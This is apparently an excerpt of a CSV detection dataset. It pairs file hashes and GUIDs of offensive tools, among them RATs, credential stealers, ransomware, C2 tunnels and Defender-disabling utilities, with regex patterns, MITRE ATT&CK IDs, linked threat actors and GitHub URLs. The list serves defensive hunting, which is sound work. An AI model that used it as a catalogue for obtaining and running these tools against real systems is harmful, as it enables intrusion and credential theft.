"*42e10ec6f9a5276060bade151ccd929325daa8ac8910ee26de5e6eebe10f77aa*",".{0,1000}42e10ec6f9a5276060bade151ccd929325daa8ac8910ee26de5e6eebe10f77aa.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","#filehash","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","25524"
"*42e2d4b8d628e3df77baf23238076afb7003f1d31fb08032324f249d80df8302*",".{0,1000}42e2d4b8d628e3df77baf23238076afb7003f1d31fb08032324f249d80df8302.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","25525"
"*42e42476084102789dfef4a1369a3028c2319de6a34ba704db907dedf63e2b29*",".{0,1000}42e42476084102789dfef4a1369a3028c2319de6a34ba704db907dedf63e2b29.{0,1000}","offensive_tool_keyword","Invoke-PowerIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/The-Viper-One/Invoke-PowerIncrease","1","0","#filehash","N/A","8","1","3","0","2024-08-01T18:10:02Z","2024-07-18T17:40:26Z","25526"
"*42e504f3d9d9800c1c75ff6d8c5433d801e7148760cba709fa3bd5dd8e4a0208*",".{0,1000}42e504f3d9d9800c1c75ff6d8c5433d801e7148760cba709fa3bd5dd8e4a0208.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","25527"
"*42e93d295e08ea6af4885814b8cf66d43a875be0ee5b8966b5685e3e5269efb6*",".{0,1000}42e93d295e08ea6af4885814b8cf66d43a875be0ee5b8966b5685e3e5269efb6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25528"
"*42ed4b264f24de92e3387050c12873516deca3c8ac74a6f598931f1c7cbe2180*",".{0,1000}42ed4b264f24de92e3387050c12873516deca3c8ac74a6f598931f1c7cbe2180.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25529"
"*42f2144abf71b5273d1d0164a4ac254089b29a374f198cb5e0c15bcb7fd717ac*",".{0,1000}42f2144abf71b5273d1d0164a4ac254089b29a374f198cb5e0c15bcb7fd717ac.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25531"
"*42f2eae86bb872932ad6081d3b146a59aa2cc109e3a975c3e0a41f41e80599a3*",".{0,1000}42f2eae86bb872932ad6081d3b146a59aa2cc109e3a975c3e0a41f41e80599a3.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25532"
"*430291aab4a597081838f02b2ceabce6f5c8bd59334244c82229e4c648d28ac6*",".{0,1000}430291aab4a597081838f02b2ceabce6f5c8bd59334244c82229e4c648d28ac6.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25534"
"*43195f385c68a53280d094289acfe2730ed0c503053e704a33a563e0aa0825fe*",".{0,1000}43195f385c68a53280d094289acfe2730ed0c503053e704a33a563e0aa0825fe.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","25535"
"*4323e08164a3e0249f03d697dd22398b7ce185879581a4fc23588bb9a4d50ae6*",".{0,1000}4323e08164a3e0249f03d697dd22398b7ce185879581a4fc23588bb9a4d50ae6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25537"
"*4326c3679fa4ee537a32a69abbbd19890aec7d108ad19d3a86eb3724213e031c*",".{0,1000}4326c3679fa4ee537a32a69abbbd19890aec7d108ad19d3a86eb3724213e031c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25538"
"*4328364d7fbb9555b5602f2c980475917bc34f73e6839da366d52a277715c37e*",".{0,1000}4328364d7fbb9555b5602f2c980475917bc34f73e6839da366d52a277715c37e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25539"
"*43299df4a5e2edbfcc0443c9555b10a8a603015a20213f63a7e0e2b7923a4603*",".{0,1000}43299df4a5e2edbfcc0443c9555b10a8a603015a20213f63a7e0e2b7923a4603.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","25540"
"*432bb0868bd1152ce689dda88d274bb05671174c5c892c7db0575e50abcadf4c*",".{0,1000}432bb0868bd1152ce689dda88d274bb05671174c5c892c7db0575e50abcadf4c.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","#filehash","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","25541"
"*4334cdefe34ccba3224c79ed27d7feb1980e8f138a6dd0f993f6f830caa2476b*",".{0,1000}4334cdefe34ccba3224c79ed27d7feb1980e8f138a6dd0f993f6f830caa2476b.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","25542"
"*433b8dd9a46d99f08c74b3ed9989848fe2e90498fbdac603b27812fb89be9340*",".{0,1000}433b8dd9a46d99f08c74b3ed9989848fe2e90498fbdac603b27812fb89be9340.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","25543"
"*433d24896033946acf7ccde0ff7a7d5d0d8608bf1601ac55554d31219dac9995*",".{0,1000}433d24896033946acf7ccde0ff7a7d5d0d8608bf1601ac55554d31219dac9995.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","25544"
"*433d59580b95a3e3b82364729aac65643385eb4500c46eae2aab1c0567df03e6*",".{0,1000}433d59580b95a3e3b82364729aac65643385eb4500c46eae2aab1c0567df03e6.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","#filehash","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","25545"
"*43438e6c4a6683e369fdd9bf0d65f934e0ce0387374607269f0cb707a742d09a*",".{0,1000}43438e6c4a6683e369fdd9bf0d65f934e0ce0387374607269f0cb707a742d09a.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","25546"
"*4347d68bd769cf25fa1046b8c9c3f5f4c1c83ae6b96ac1d3ed4b8dce7647c22c*",".{0,1000}4347d68bd769cf25fa1046b8c9c3f5f4c1c83ae6b96ac1d3ed4b8dce7647c22c.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","25547"
"*4349B8A8-F17B-44D5-AE4D-21BE9C9D1573*",".{0,1000}4349B8A8\-F17B\-44D5\-AE4D\-21BE9C9D1573.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","25549"
"*4350a69f2630214a7b079e41e3ac2d7c5759a622a0cd1227ba12eee06d758d9a*",".{0,1000}4350a69f2630214a7b079e41e3ac2d7c5759a622a0cd1227ba12eee06d758d9a.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","25552"
"*4351D871B1B4CB1BA8F54C52A6786C809707A05353B46EA1AF9A4950D88C4E61*",".{0,1000}4351D871B1B4CB1BA8F54C52A6786C809707A05353B46EA1AF9A4950D88C4E61.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","25554"
"*43565fef63fccc1c7ad4781870b96ac61b93974ac1495700ee461621ed6b432c*",".{0,1000}43565fef63fccc1c7ad4781870b96ac61b93974ac1495700ee461621ed6b432c.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","25556"
"*4358d271e8e3db49fc9ba98ab0709727f9043a129b5978ebaa23881f60b26b64*",".{0,1000}4358d271e8e3db49fc9ba98ab0709727f9043a129b5978ebaa23881f60b26b64.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","25557"
"*435c30dbc7c59f5d013f8088b1f9be04ba003a4d04d7f69d8006bdf190a84bee*",".{0,1000}435c30dbc7c59f5d013f8088b1f9be04ba003a4d04d7f69d8006bdf190a84bee.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","25558"
"*436a88ff9bedb6b4264d64e28be4a4c1b41e125bfa5fdab941c6d045d9a4e77e*",".{0,1000}436a88ff9bedb6b4264d64e28be4a4c1b41e125bfa5fdab941c6d045d9a4e77e.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25560"
"*436b7f540f534a0ec1337cf82a76cb7727acda423132195f0c81560cdf75c438*",".{0,1000}436b7f540f534a0ec1337cf82a76cb7727acda423132195f0c81560cdf75c438.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","#filehash","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","25561"
"*4370e110d8731b6b6fbb98d9ae2ffae6a3b00a8329b2700e86b15e1bd97166c1*",".{0,1000}4370e110d8731b6b6fbb98d9ae2ffae6a3b00a8329b2700e86b15e1bd97166c1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25562"
"*4373252deaaf3b0ae87b409669e592e94cf501f02da96ccf9a62f76244048a74*",".{0,1000}4373252deaaf3b0ae87b409669e592e94cf501f02da96ccf9a62f76244048a74.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25564"
"*4374b7f67ac23d9fc63fac8b9da7e279edd897ee5854d6a67c64ec648974e3fa*",".{0,1000}4374b7f67ac23d9fc63fac8b9da7e279edd897ee5854d6a67c64ec648974e3fa.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","25565"
"*4379af4a67693b483f0b935117a0b377a63a725032da0a25b62dc883a02280b6*",".{0,1000}4379af4a67693b483f0b935117a0b377a63a725032da0a25b62dc883a02280b6.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25567"
"*437c338d694eab03b98922ad42d0ad890be0e7c94be0a278115e638e2dad27c0*",".{0,1000}437c338d694eab03b98922ad42d0ad890be0e7c94be0a278115e638e2dad27c0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25568"
"*437f2e82e5fd2de01257379e1e155f380ad173c35f32a02eeedd1a06a262e8a3*",".{0,1000}437f2e82e5fd2de01257379e1e155f380ad173c35f32a02eeedd1a06a262e8a3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25569"
"*437fe49b059cae6e3fa58e998cc73d10c309fe76c0c2ce6e49e936589dcfd474*",".{0,1000}437fe49b059cae6e3fa58e998cc73d10c309fe76c0c2ce6e49e936589dcfd474.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25570"
"*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25571"
"*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25572"
"*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25573"
"*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25574"
"*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25575"
"*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25576"
"*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25577"
"*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25578"
"*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25579"
"*438bf6db9eece197ef8d3e133a7e229086b5682d*",".{0,1000}438bf6db9eece197ef8d3e133a7e229086b5682d.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","25582"
"*438dbddd65bd3110fe61ebe3266d1cb441ea25dfc13cb626c076203e5721244d*",".{0,1000}438dbddd65bd3110fe61ebe3266d1cb441ea25dfc13cb626c076203e5721244d.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","25583"
